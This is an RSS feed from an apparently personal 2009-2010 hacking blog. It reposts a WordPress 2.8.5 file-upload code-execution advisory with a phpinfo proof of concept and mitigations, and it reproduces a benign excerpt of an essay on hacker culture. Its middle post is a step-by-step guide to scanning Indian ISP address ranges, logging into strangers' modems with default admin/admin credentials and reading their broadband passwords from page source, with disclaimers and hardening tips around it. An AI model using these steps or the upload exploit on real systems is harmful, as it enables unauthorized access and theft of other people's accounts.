<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Ankit Kumar Agarwal &#187; Tutorials</title>
	<atom:link href="http://ankitkumaragarwal.com/category/tutorials/feed/" rel="self" type="application/rss+xml" />
	<link>http://ankitkumaragarwal.com</link>
	<description>Hack the way you Think!!</description>
	<lastBuildDate>Thu, 20 May 2010 05:27:27 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<image>
<link>http://ankitkumaragarwal.com</link>
<url>http://ankitkumaragarwal.com/wp-content/plugins/maxblogpress-favicon/icons/favicon-56.ico</url>
<title>Ankit Kumar Agarwal</title>
</image>
		<item>
		<title>WordPress 2.8.5 Unrestricted File Upload Arbitrary PHP Code Execution</title>
		<link>http://ankitkumaragarwal.com/wordpress-2-8-5-unrestricted-file-upload-arbitrary-php-code-execution/</link>
		<comments>http://ankitkumaragarwal.com/wordpress-2-8-5-unrestricted-file-upload-arbitrary-php-code-execution/#comments</comments>
		<pubDate>Fri, 13 Nov 2009 16:11:16 +0000</pubDate>
		<dc:creator>Ankit Kumar Agarwal</dc:creator>
				<category><![CDATA[News]]></category>
		<category><![CDATA[Tutorials]]></category>
		<category><![CDATA[hacking]]></category>

		<guid isPermaLink="false">http://ankitkumaragarwal.com/?p=104</guid>
<description><![CDATA[Recently Dawid Golunski released a WordPress 2.8.5 exploit which lets users execute arbitrary PHP code.
After I had a conversation with him it was concluded that this exploit is confined to a few Apache servers only and other servers are safe!! Below is a copy of his disclosure and our conversation:-
Disclosure
==============================
===============
- Release date: November 11th, [...]]]></description>
<content:encoded><![CDATA[<p>Recently Dawid Golunski released a WordPress 2.8.5 exploit which lets users execute arbitrary PHP code.</p>
<p>After I had a conversation with him it was concluded that this exploit is confined to a <strong>few Apache</strong> servers only and other servers are safe!! Below is a copy of his disclosure and our conversation:-</p>
<p><strong>Disclosure</strong></p>
<div id=":1lv"><p>=============================================<br />
- Release date: November 11th, 2009<br />
- Discovered by: Dawid Golunski<br />
- Severity: Moderately High<br />
=============================================</p>
<p>I. VULNERABILITY<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-<br />
WordPress &lt;= 2.8.5 Unrestricted File Upload Arbitrary PHP Code Execution</p>
<p>II. BACKGROUND<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-<br />
WordPress is a state-of-the-art publishing platform with a focus on aesthetics, web standards,<br />
and  usability. WordPress is both free and priceless at the same time. More simply, WordPress is<br />
what you use when you want to work with your blogging software, not fight it.</p>
<p>III. DESCRIPTION<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-</p>
<p>WordPress allows authorised users to add an attachment to a blog post.<br />
It does not sanitize the provided file properly before moving it to the uploads directory.</p>
<p>The part of the code responsible for uploading files looks as follows:</p>
<p>wp-admin/includes/file.php:<br />
&#8212;[cut]&#8212;<br />
line 217:<br />
function wp_handle_upload( &amp;$file, $overrides = false, $time = null ) {<br />
&#8212;[cut]&#8212;<br />
// All tests are on by default. Most can be turned off by $override[{test_name}] = false;<br />
$test_form = true;<br />
$test_size = true;</p>
<p>// If you override this, you must provide $ext and $type!!!!<br />
$test_type = true;<br />
$mimes = false;<br />
&#8212;[cut]&#8212;</p>
<p>// A properly uploaded file will pass this test. There should be no reason to override this one.<br />
if (! @ is_uploaded_file( $file['tmp_name'] ) )<br />
return $upload_error_handler( $file, __( 'Specified file failed upload test.' ));</p>
<p>// A correct MIME type will pass this test. Override $mimes or use the upload_mimes filter.<br />
if ( $test_type ) {<br />
$wp_filetype = wp_check_filetype( $file['name'], $mimes );</p>
<p>extract( $wp_filetype );</p>
<p>if ( ( !$type || !$ext ) &amp;&amp; !current_user_can( 'unfiltered_upload' ) )<br />
return $upload_error_handler( $file,<br />
__( 'File type does not meet security guidelines. Try another.' ));</p>
<p>if ( !$ext )<br />
$ext = ltrim(strrchr($file['name'], '.'), '.');</p>
<p>if ( !$type )<br />
$type = $file['type'];<br />
} else {<br />
$type = '';<br />
}</p>
<p>// A writable uploads dir will pass this test. Again, there's no point overriding this one.<br />
if ( ! ( ( $uploads = wp_upload_dir($time) ) &amp;&amp; false === $uploads['error'] ) )<br />
return $upload_error_handler( $file, $uploads['error'] );</p>
<p>$filename = wp_unique_filename( $uploads['path'], $file['name'], $unique_filename_callback );</p>
<p>// Move the file to the uploads dir<br />
$new_file = $uploads['path'] . "/$filename";<br />
if ( false === @ move_uploaded_file( $file['tmp_name'], $new_file ) ) {<br />
return $upload_error_handler( $file,<br />
sprintf( __( 'The uploaded file could not be moved to %s.' ), $uploads['path'] ) );<br />
}<br />
&#8212;[cut ]&#8212;</p>
<p>From the above code we can see that provided filename gets checked with:<br />
$wp_filetype = wp_check_filetype( $file['name'], $mimes );</p>
<p>Here is how the wp_check_filetype() function looks like:</p>
<p>wp-includes/functions.php:<br />
&#8212;[cut]&#8212;<br />
line 2228:</p>
<p>function wp_check_filetype( $filename, $mimes = null ) {<br />
// Accepted MIME types are set here as PCRE unless provided.<br />
$mimes = ( is_array( $mimes ) ) ? $mimes : apply_filters( 'upload_mimes', array(<br />
'jpg|jpeg|jpe' =&gt; 'image/jpeg',<br />
'gif' =&gt; 'image/gif',<br />
'png' =&gt; 'image/png',<br />
'bmp' =&gt; 'image/bmp',<br />
'tif|tiff' =&gt; 'image/tiff',<br />
'ico' =&gt; 'image/x-icon',<br />
'asf|asx|wax|wmv|wmx' =&gt; 'video/asf',<br />
'avi' =&gt; 'video/avi',</p>
<p>&#8212;[cut, more mime types]&#8212;<br />
line 2279:</p>
<p>$type = false;<br />
$ext = false;</p>
<p>foreach ( $mimes as $ext_preg =&gt; $mime_match ) {<br />
$ext_preg = '!\.(' . $ext_preg . ')$!i';<br />
if ( preg_match( $ext_preg, $filename, $ext_matches ) ) {<br />
$type = $mime_match;<br />
$ext = $ext_matches[1];<br />
break;<br />
}<br />
}</p>
<p>return compact( 'ext', 'type' );<br />
}</p>
<p>We can see that the type of the file gets set to a predefined MIME type that matches the supplied<br />
extension, and that the extension is obtained from a regexp that matches a MIME ext. string after<br />
the LAST dot.<br />
If the extension is not on the list, $type and $ext will be set to FALSE and WordPress will<br />
produce an error (&#8220;File type does not meet security guidelines. Try another&#8221;).</p>
<p>Let&#8217;s look at the other check that is performed on the filename before a file gets uploaded,<br />
that is a call to the following function:<br />
$filename = wp_unique_filename( $uploads['path'], $file['name'], $unique_filename_callback );</p>
<p>wp-includes/functions.php:<br />
line 2096:<br />
function wp_unique_filename( $dir, $filename, $unique_filename_callback = null ) {<br />
// sanitize the file name before we begin processing<br />
$filename = sanitize_file_name($filename);</p>
<p>&#8212;[cut, code that only matters if uploaded file already exists]&#8212;<br />
line 2126:<br />
return $filename;<br />
}</p>
<p>To have a complete view on file sanitization performed by wordpress we need to look into the<br />
sanitize_file_name() function:</p>
<p>wp-includes/formatting.php:<br />
line 601:<br />
function sanitize_file_name( $filename ) {<br />
$filename_raw = $filename;<br />
$special_chars = array("?", "[", "]", "/", "\\", "=", "&lt;", "&gt;", ":", ";", ",", "'", "\"",<br />
"&amp;", "$", "#", "*", "(", ")", "|", "~", "`", "!", "{", "}", chr(0));<br />
$special_chars = apply_filters('sanitize_file_name_chars', $special_chars, $filename_raw);<br />
$filename = str_replace($special_chars, '', $filename);<br />
$filename = preg_replace('/[\s-]+/', '-', $filename);<br />
$filename = trim($filename, '.-_');<br />
return apply_filters('sanitize_file_name', $filename, $filename_raw);<br />
}</p>
<p>This function removes the special characters shown above, replaces spaces and consecutive dashes with<br />
a single dash, and trims periods, dashes and underscores from the beginning and end of the filename.</p>
<p>The sanitization process appears quite extensive; however, it does not take into account files that<br />
have multiple extensions.<br />
It is possible to upload a file containing an arbitrary PHP script with an extension of &#8216;.php.jpg&#8217;<br />
and execute it by requesting the uploaded file directly.</p>
<p>The execution of the PHP code despite the .php.jpg extension is possible because Apache<br />
allows for multiple extensions. Here is a quote from Apache docs regarding this matter:</p>
<p>&#8220;<br />
Files can have more than one extension, and the order of the extensions is normally irrelevant.<br />
For example, if the file welcome.html.fr maps onto content type text/html and language French then<br />
the file welcome.fr.html will map onto exactly the same information. If more than one extension is<br />
given that maps onto the same type of meta-information, then the one to the right will be used,<br />
except for languages and content encodings. For example, if .gif maps to the MIME-type  image/gif<br />
and .html maps to the MIME-type text/html, then the file welcome.gif.html will be associated with<br />
the MIME-type text/html.</p>
<p>Care should be taken when a file with multiple extensions gets associated with both a MIME-type<br />
and a handler. This will usually result in the request being handled by the module associated with<br />
the handler. For example, if the .imap  extension is mapped to the handler imap-file<br />
(from mod_imagemap) and the .html extension is mapped to the MIME-type text/html, then the file<br />
world.imap.html will be associated with both the imap-file handler and text/html MIME-type.<br />
When it is processed, the imap-file handler will be used, and so it will be treated as a<br />
mod_imagemap imagemap file.<br />
&#8221;</p>
<p>IV. PROOF OF CONCEPT<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-<br />
A browser is enough to replicate this issue. Simply log in to your WordPress blog as a low-privileged<br />
user or admin. Create a new post and use the media file upload feature to upload a file:</p>
<p>test-image.php.jpg</p>
<p>containing the following code:</p>
<p>&lt;?php<br />
phpinfo();<br />
?&gt;</p>
<p>After the upload you should receive a positive response saying:</p>
<p>test-vuln.php.jpg<br />
image/jpeg<br />
2009-11-11</p>
<p>and it should be possible to request the uploaded file via a link:<br />
<a href="http://link-to-our-wp-unsecured-blog.com/wp-content/uploads/2009/11/test-vuln.php.jpg" target="_blank">http://link-to-our-wp-unsecured-blog.com/wp-content/uploads/2009/11/test-vuln.php.jpg</a></p>
<p>thus executing the PHP code it contains.</p>
<p>In the above code example, a php info page will be shown.</p>
<p>V. BUSINESS IMPACT<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-<br />
An attacker that has already obtained login details (for example by stealing a user&#8217;s cookies with<br />
an XSS attack) to the blog as one of the existing users could exploit this vulnerability to get<br />
access to the system in the Apache user&#8217;s context.<br />
From there he could use local bugs to further escalate privileges. The Apache account would be<br />
enough in most cases to view the source code and gain access to the databases.</p>
<p>Some wordpress users of the 2.8.5 release have reported that some php files have been added to<br />
their wordpress directory. It could be possible that they have been hit by this bug. Therefore it<br />
is important to take some countermeasures as soon as possible.</p>
<p>VI. SYSTEMS AFFECTED<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-<br />
Most likely all of the WordPress releases contain this bug, including the current hardened stable<br />
release 2.8.5 and the beta version.</p>
<p>VII. SOLUTION<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-<br />
Vendor has been informed about the bug. Currently wordpress developers and contributors are in<br />
the process of bug hunting and fixing reported bugs in beta versions before the new stable release,<br />
so hopefully it should not take long for them to take this problem into account.</p>
<p>You can apply the temporary solutions for this problem which I provide below before an official<br />
patch is made.</p>
<p>You can create a .htaccess file in the uploads dir (wordpress/wp-content/uploads) with<br />
the following content:</p>
<p>deny from all<br />
&lt;Files ~ "^\w+\.(gif|jpe?g|png|avi)$"&gt;<br />
order deny,allow<br />
allow from all<br />
&lt;/Files&gt;</p>
<p>Adjust allowed file extensions in the brackets if necessary.<br />
This will prevent Apache from serving files with double extensions inside the uploads directory.</p>
<p>Alternatively you can try to patch the source code yourself by editing the<br />
wp-admin/includes/file.php file and the wp_handle_upload() function it contains. An example patch<br />
could be to add the following three lines of code at the line 260:</p>
<p>// Fix Unrestricted File Upload Arbitrary PHP Code Execution bug, return if more than 1 extension provided<br />
if ( count( explode( '.', $file['name'] ) ) &gt; 2 )<br />
return $upload_error_handler( $file, __( 'File type does not meet security guidelines. Try another.' ) );</p>
<p>VIII. REFERENCES<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-<br />
<a href="http://www.wordpress.org/" target="_blank">http://www.wordpress.org</a><br />
<a href="http://httpd.apache.org/docs/2.2/mod/mod_mime.html#multipleext" target="_blank">http://httpd.apache.org/docs/2.2/mod/mod_mime.html#multipleext</a></p>
<p>IX. CREDITS<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-<br />
This vulnerability has been discovered by Dawid Golunski<br />
golunski (at) onet (dot) eu</p>
<p>Greetings go to: robxt, sajanek, xsoti, bart, falcon (for the old time&#8217;s sake :) and complexmind</p>
<p>X. REVISION HISTORY<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-<br />
November 11th, 2009: Initial release</p>
<p>XI. LEGAL NOTICES<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-<br />
The information contained within this advisory is supplied &#8220;as-is&#8221; with no warranties or guarantees of fitness of<br />
use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information.</p></div>
<div><strong>Counter question by me</strong></div>
<div>Hi,<br />
I was testing this and I just get the URL echoed, nothing else. The phpinfo command didn&#8217;t work.<br />
Am I missing something?<br />
Moreover:
<div>
For example, if .gif maps to the MIME-type image/gif<br />
and .html maps to the MIME-type text/html, then the file welcome.gif.html will be associated with<br />
the MIME-type text/html.</div>
</div>
<div>So doesn&#8217;t that mean that the file will be associated with jpg only?<br />
Sorry if you think this is noobish, but I am not able to figure it out.<br />
Thanks</div>
<div>Ankit Kumar Agarwal</div>
<div><strong>His reply</strong></div>
<div>Hi,
<div>Yes, you missed the other part of the quote from the Apache docs :) That is:</div>
<div>
<div>&#8220;Care should be taken when a file with multiple extensions gets associated with both a MIME-type</div>
<div>and a handler. This will usually result in the request being handled by the module associated with</div>
<div>the handler. For example, if the .imap  extension is mapped to the handler imap-file</div>
<div>(from mod_imagemap) and the .html extension is mapped to the MIME-type text/html, then the file</div>
<div>world.imap.html will be associated with both the imap-file handler and text/html MIME-type.</div>
<div>When it is processed, the imap-file handler will be used, and so it will be treated as a</div>
<div>mod_imagemap imagemap file.&#8221;</div>
</div>
<div>A lot of systems that use apache/php have their apache configured so that it handles .php files via:</div>
<div>AddHandler php5-script .php</div>
<div>as opposed to :</div>
<div>AddType application/x-httpd-php .php (which is probably your case)</div>
<div>According to the above, handlers have priority over MIME types, thus .php.jpg will be executed as PHP.</div>
<div>I&#8217;m going to clarify this on bugtraq soon so it is clear for others too.</div>
<div>Hope this clarifies it.</div>
<div>Take care,</div>
<div>Dawid</div>
</div>
<div><strong>His public explanation of what I asked</strong></div>
<div><p>Hi,<br />
Just wanted to add a quick update on affected systems, since I forgot to mention web servers along with WordPress versions in my advisory.<br />
Some people are wondering why the vulnerability doesn&#8217;t work on their system.</p>
<p>I&#8217;m pretty sure that the exploit won&#8217;t work on web servers other than Apache (as they probably won&#8217;t process extensions other than the last one). So non-Apache-based servers are probably safe here.<br />
Whether it will work on your Apache server or not depends on your mod_php configuration.<br />
The exploit won&#8217;t work on servers where PHP script handling has been configured as follows:</p>
<p>&lt;FilesMatch \.php$&gt;<br />
SetHandler application/x-httpd-php<br />
&lt;/FilesMatch&gt;</p>
<p>If the exploit doesn&#8217;t work for you this is most likely the case.</p>
<p>The exploit however will work on systems where php scripts are handled via the following setting in the php.conf:</p>
<p>AddHandler php5-script .php</p>
<p>which I think is quite common. For example Apache distributed in Red Hat based systems seem to have php configured in such a way.</p>
<p>Hope this clears the matter a bit.</p>
<p>Regards,<br />
Dawid</p></div>
<div>That&#8217;s it. Don&#8217;t misuse the above information!!</div>
]]></content:encoded>
			<wfw:commentRss>http://ankitkumaragarwal.com/wordpress-2-8-5-unrestricted-file-upload-arbitrary-php-code-execution/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
<title>How to Hack BSNL broadband accounts?</title>
		<link>http://ankitkumaragarwal.com/how-to-hack-bsnl-brod-band-aacounts/</link>
		<comments>http://ankitkumaragarwal.com/how-to-hack-bsnl-brod-band-aacounts/#comments</comments>
		<pubDate>Wed, 27 May 2009 07:42:00 +0000</pubDate>
		<dc:creator>Ankit Kumar Agarwal</dc:creator>
				<category><![CDATA[Tutorials]]></category>
		<category><![CDATA[hacking]]></category>

		<guid isPermaLink="false">http://ankitkumaragarwal.com/?p=49</guid>
<description><![CDATA[Disclaimer: The information provided below is for educational purposes only. The author is not responsible for any misuse of the information and discourages any illegal use of it.

BSNL DataOne Broadband continues to grow as one of the most popular broadband services in India with high-speed facilities of up to 2 Mbps. But a [...]]]></description>
<content:encoded><![CDATA[<p><b>Disclaimer: The information provided below is for educational purposes only. The author is not responsible for any misuse of the information and discourages any illegal use of it.</b></p>
<p>BSNL DataOne Broadband continues to grow as one of the most popular broadband services in India with high-speed facilities of up to 2 Mbps. But a large number of users of this service are vulnerable to hacker attacks because discovering and hacking the vulnerable victims of this network is shockingly simple. If you are a BSNL Broadband user then immediately assess the security of your internet connection and take appropriate steps to secure yourself.</p>
<p><b>First let&#8217;s see how simple it is to hack BSNL DataOne broadband usernames and passwords. For this you need an IP scanner tool called Angry IP Scanner (http://www.angryziber.com/ipscan/) or anything similar.</b></p>
<p>OK, so let&#8217;s begin&#8230; Get your IP from:<br />
www.ipmango.com</p>
<p>Step 1: Start Angry IP Scanner and go to Options > Ports. Type 80 in the first ports textbox and click OK.<br />
Then go to Options > Options; in the display section select &#8220;only open ports&#8221; and click OK &amp; Save.</p>
<p>Now on the main screen put in the IP scan range as something like 59.*.0.0 &#8211; 59.*.255.255 (e.g. 59.95.2.3) and click the start button. The list that follows next is the victims. In this example we chose the range 59.95.0.0 &#8211; 59.95.255.255. You will be surprised at the number of victims you discover.</p>
<p>Step 2: Pick the IP address of any of them, open up your browser and type in http://59.*.*.* (the * should be replaced by the values from the IP you are using). A box will pop up asking for username and password. Enter the username: admin and password: admin. There is a high chance that you will be able to log in with that username and password.<br />
admin/admin is the default username and password that is set while manufacturing the ADSL modem devices.</p>
<p>What follows next is the modem administration panel.<br />
Simply search for the &#8220;WAN&#8221; option and click it. On the next page you will find the username and password of that user. Now right-click on the page and click View Source (in Mozilla/Opera: This Frame -> View Frame Source).</p>
<p>Now in the source code search for this: INPUT TYPE="PASSWORD"</p>
<p>and the value field of this input element will have the password.</p>
<p>If it is not there, as in the case of D-Link DSL 502T ADSL routers, then search for this:</p>
<p>input type="hidden" name="connection0:pppoe:settings/password" value="password" id="uiPostPppoePassword"</p>
<p>and the value field will have the password.<br />
Well, each step takes less than 1 minute, so getting usernames and passwords won&#8217;t take even 2 minutes and is easier than sending a mail.</p>
<p>And this exposes the weak security of BSNL broadband users.</p>
<p>Well, this is not a weakness but more of a misconfiguration which leads to insecurity. If you understand networking then you would probably realise that this was merely logging into the remote administration service of the modem and nothing else. This was not really hacking but a simple search for victims who are absolutely ignorant of their weak security on the internet.</p>
<p>Most routers have an option where remote management can be disabled. In other words, you can only connect to the configuration interface from the internal network, not the WAN (Internet) side. You would definitely want to make sure remote management is not active to protect yourself.</p>
<p>Note: On the SmartAX MT880, even though Remote Management is disabled, it permits remote logins from over the Internet. So change your modem administration passwords immediately.</p>
<p>The problem is that the professionals at BSNL are ignorant of such simple networking matters and unable to advise the users or guide them to take proper security measures, leaving their customers and themselves absolutely insecure.</p>
<p>Now let&#8217;s check a few more options related to this issue. A BSNL broadband modem can be used in two modes: RFC bridged mode and PPPoE mode.</p>
<p>In RFC bridged mode the device behaves like a modem attached to your computer and you use some dial-up software to dial into the ISP through this modem. This is PPPoE from the PC, and the ADSL device is just a modem. This mode is safer, as the username and password are on your PC and nothing is on the modem.</p>
<p>In PPPoE mode the ADSL device becomes a router &#8211; a distinct network device with many features enabled. In this mode the username and password are stored in the modem, which dials the ISP and establishes the internet connectivity. The computers just connect to this router, which is their primary gateway. This is the mode where the risk exists.</p>
<p>If remote administration is enabled, remote users from the internet can log in to this modem&#8217;s administration panel. The main problem is the default admin username/password, which most users don&#8217;t change due to ignorance. &#8220;admin/admin&#8221; is the pair that works in most cases, giving full access to the modem&#8217;s internals. What follows next is as simple as drinking a glass of orange juice.</p>
<p>Many users install firewalls and think they are safe, but they fail to understand that the firewall protects their PC, not the &#8220;router&#8221;, since the topology is like</p>
<p>(PC) -> router -> internet</p>
<p>So how should you secure yourself?</p>
<p>1. Use RFC bridged mode if it is sufficient for you.</p>
<p>2. Change the default admin password of your modem.</p>
<p>3. Disable WAN ping reply. (This will prevent attackers from directly discovering your PC when it is on the internet.)</p>
<p>4. Disable the remote configuration feature.</p>
<p>5. Check your broadband usage on a regular basis and compare it with your own surfing schedule to check whether someone else has used it or not. If suspicious usage is indicated then immediately change your broadband password as well. Or, better, change your broadband password on a regular basis.</p>
<p>Try to spread the security awareness to your friends and other relatives who are using Bsnl broadband and encourage them to secure their internet connectivity.</p>
<p><b>Disclaimer: The information provided above is for educational purposes only. The main purpose of the author is to spread awareness amongst users. The author is not responsible for any misuse of the information and discourages any illegal use of it.</b></p>
]]></content:encoded>
			<wfw:commentRss>http://ankitkumaragarwal.com/how-to-hack-bsnl-brod-band-aacounts/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>How to become a hacker-ch 4</title>
		<link>http://ankitkumaragarwal.com/how-to-become-a-hacker-ch-4/</link>
		<comments>http://ankitkumaragarwal.com/how-to-become-a-hacker-ch-4/#comments</comments>
		<pubDate>Fri, 21 Nov 2008 18:09:00 +0000</pubDate>
		<dc:creator>Ankit Kumar Agarwal</dc:creator>
				<category><![CDATA[Tutorials]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[info]]></category>

		<guid isPermaLink="false">http://ankitkumaragarwal.com/?p=23</guid>
		<description><![CDATA[chapter-4
Table of contents
Points For Style
Other Resources
Frequently Asked Questions
The Hacker/Nerd Connection
Contrary to popular myth, you don&#8217;t have to be a nerd to be a hacker. It does help, however, and many hackers are in fact nerds. Being something of a social outcast helps you stay concentrated on the really important things, like thinking and hacking.

 
For [...]]]></description>
<content:encoded><![CDATA[<p><b><i>chapter-4</i></b></p>
<p><b><i>Table of contents</i></b></p>
<p>Points For Style</p>
<p>Other Resources</p>
<p>Frequently Asked Questions</p>
<p><b>The Hacker/Nerd Connection</b></p>
<p>Contrary to popular myth, you don&#8217;t have to be a nerd to be a hacker. It does help, however, and many hackers are in fact nerds. Being something of a social outcast helps you stay concentrated on the really important things, like thinking and hacking.</p>
<p><span style="" lang="EN">For this reason, many hackers have adopted the label ‘geek’ as a badge of pride — it&#8217;s a way of declaring their independence from normal social expectations (as well as a fondness for other things like science fiction and strategy games that often go with being a hacker). The term &#8216;nerd&#8217; used to be used this way back in the 1990s, back when &#8216;nerd&#8217; was a mild pejorative and &#8216;geek&#8217; a rather harsher one; sometime after 2000 they switched places, at least in U.S. popular culture, and there is now even a significant geek-pride culture among people who aren&#8217;t techies.</span><span style=""><o:p></o:p></span></p>
<p><span style="" lang="EN">If you can manage to concentrate enough on hacking to be good at it and still have a life, that&#8217;s fine. This is a lot easier today than it was when I was a newbie in the 1970s; mainstream culture is much friendlier to techno-nerds now. There are even growing numbers of people who realize that hackers are often high-quality lover and spouse material.</span><span style=""><o:p></o:p></span></p>
<p><span style="" lang="EN">If you&#8217;re attracted to hacking because you don&#8217;t have a life, that&#8217;s OK too — at least you won&#8217;t have trouble concentrating. Maybe you&#8217;ll get a life later on.</span><span style=""><o:p></o:p></span></p>
<p><b><span style="" lang="EN">Points For Style</span><o:p></o:p></b></p>
<p><span style="" lang="EN">Again, to be a hacker, you have to enter the hacker mindset. There are some things you can do when you&#8217;re not at a computer that seem to help. They&#8217;re not substitutes for hacking (nothing is) but many hackers do them, and feel that they connect in some basic way with the essence of hacking.</span><span style=""><o:p></o:p></span></p>
<p style="margin-left: 0.5in; text-indent: -0.25in;"><span style="" lang="EN">· Learn to write your native language well. Though it&#8217;s a common stereotype that programmers can&#8217;t write, a surprising number of hackers (including all the most accomplished ones I know of) are very able writers.</span></p>
<p style="margin-left: 0.5in; text-indent: -0.25in;"><span style="" lang="EN">· Read science fiction. Go to science fiction conventions (a good way to meet hackers and proto-hackers).</span></p>
<p style="margin-left: 0.5in; text-indent: -0.25in;"><span style="" lang="EN">· Train in a martial-arts form. The kind of mental discipline required for martial arts seems to be similar in important ways to what hackers do. The most popular forms among hackers are definitely Asian empty-hand arts such as Tae Kwon Do, various forms of Karate, Kung Fu, Aikido, or Ju Jitsu. Western fencing and Asian sword arts also have visible followings. In places where it&#8217;s legal, pistol shooting has been rising in popularity since the late 1990s. The most hackerly martial arts are those which emphasize mental discipline, relaxed awareness, and control, rather than raw strength, athleticism, or physical toughness.</span></p>
<p style="margin-left: 0.5in; text-indent: -0.25in;"><span style="" lang="EN">· Study an actual meditation discipline. The perennial favorite among hackers is Zen (importantly, it is possible to benefit from Zen without acquiring a religion or discarding one you already have). Other styles may work as well, but be careful to choose one that doesn&#8217;t require you to believe crazy things.</span></p>
<p style="margin-left: 0.5in; text-indent: -0.25in;"><span style="" lang="EN">· Develop an analytical ear for music. Learn to appreciate peculiar kinds of music. Learn to play some musical instrument well, or how to sing.</span></p>
<p style="margin-left: 0.5in; text-indent: -0.25in;"><span style="" lang="EN">· Develop your appreciation of puns and wordplay.</span></p>
<p><span style="" lang="EN">The more of these things you already do, the more likely it is that you are natural hacker material. Why these things in particular is not completely clear, but they&#8217;re connected with a mix of left- and right-brain skills that seems to be important; hackers need to be able to both reason logically and step outside the apparent logic of a problem at a moment&#8217;s notice.</span><span style=""><o:p></o:p></span></p>
<p><span style="" lang="EN">Work as intensely as you play and play as intensely as you work. For true hackers, the boundaries between &#8220;play&#8221;, &#8220;work&#8221;, &#8220;science&#8221; and &#8220;art&#8221; all tend to disappear, or to merge into a high-level creative playfulness. Also, don&#8217;t be content with a narrow range of skills. Though most hackers self-describe as programmers, they are very likely to be more than competent in several related skills — system administration, web design, and PC hardware troubleshooting are common ones. A hacker who&#8217;s a system administrator, on the other hand, is likely to be quite skilled at script programming and web design. Hackers don&#8217;t do things by halves; if they invest in a skill at all, they tend to get very good at it.</span><span style=""><o:p></o:p></span></p>
<p><span style="" lang="EN">Finally, a few things <i>not</i> to do.</span><span style=""><o:p></o:p></span></p>
<p style="margin-left: 0.5in; text-indent: -0.25in;"><span style="" lang="EN">· Don&#8217;t use a silly, grandiose user ID or screen name.</span></p>
<p style="margin-left: 0.5in; text-indent: -0.25in;"><span style="" lang="EN">· Don&#8217;t get in flame wars on Usenet (or anywhere else).</span></p>
<p style="margin-left: 0.5in; text-indent: -0.25in;"><span style="" lang="EN">· Don&#8217;t call yourself a ‘cyberpunk’, and don&#8217;t waste your time on anybody who does.</span></p>
<p style="margin-left: 0.5in; text-indent: -0.25in;"><span style="" lang="EN">· Don&#8217;t post or email writing that&#8217;s full of spelling errors and bad grammar.</span></p>
<p><span style="" lang="EN">The only reputation you&#8217;ll make doing any of these things is as a twit. Hackers have long memories — it could take you years to live your early blunders down enough to be accepted.</span><span style=""><o:p></o:p></span></p>
<p><span style="" lang="EN">The problem with screen names or handles deserves some amplification. Concealing your identity behind a handle is a juvenile and silly behavior characteristic of crackers, warez d00dz, and other lower life forms. Hackers don&#8217;t do this; they&#8217;re proud of what they do and want it associated with their <i>real</i> names. So if you have a handle, drop it. In the hacker culture it will only mark you as a loser.</span><span style=""><o:p></o:p></span></p>
<p><b><span style="" lang="EN">Other Resources</span><o:p></o:p></b></p>
<p><span style="" lang="EN">Paul Graham has written an essay called <a href="http://www.paulgraham.com/gh.html" target="_top">Great Hackers</a>, and another on <a href="http://www.paulgraham.com/college.html" target="_top">Undergraduation</a>, in which he speaks much wisdom.</span><span style=""><o:p></o:p></span></p>
<p><span style="" lang="EN">There is a document called <a href="http://samizdat.mines.edu/howto/HowToBeAProgrammer.html" target="_top">How To Be A Programmer</a> that is an excellent complement to this one. It has valuable advice not just about coding and skillsets, but about how to function on a programming team.</span><span style=""><o:p></o:p></span></p>
<p><span style="" lang="EN">I have also written <a href="http://catb.org/%7Eesr/writings/hacker-history/hacker-history.html" target="_top"><i>A Brief History Of Hackerdom</i></a>.</span><span style=""><o:p></o:p></span></p>
<p><span style="" lang="EN">I have written a paper, <a href="http://catb.org/%7Eesr/writings/cathedral-bazaar/index.html" target="_top"><i>The Cathedral and the Bazaar</i></a>, which explains a lot about how the Linux and open-source cultures work. I have addressed this topic even more directly in its sequel <a href="http://catb.org/%7Eesr/writings/homesteading/" target="_top"><i>Homesteading the Noosphere</i></a>.</span><span style=""><o:p></o:p></span></p>
<p><span style="" lang="EN">Rick Moen has written an excellent document on <a href="http://linuxmafia.com/faq/Linux_PR/newlug.html" target="_top">how to run a Linux user group</a>.</span><span style=""><o:p></o:p></span></p>
<p><span style="" lang="EN">Rick Moen and I have collaborated on another document on <a href="http://catb.org/%7Eesr/faqs/smart-questions.html" target="_top">How To Ask Smart Questions</a>. This will help you seek assistance in a way that makes it more likely that you will actually get it.</span><span style=""><o:p></o:p></span></p>
<p><span style="" lang="EN">If you need instruction in the basics of how personal computers, Unix, and the Internet work, see <a href="http://en.tldp.org/HOWTO/Unix-and-Internet-Fundamentals-HOWTO/" target="_top">The Unix and Internet Fundamentals HOWTO</a>. </span><span style=""><o:p></o:p></span></p>
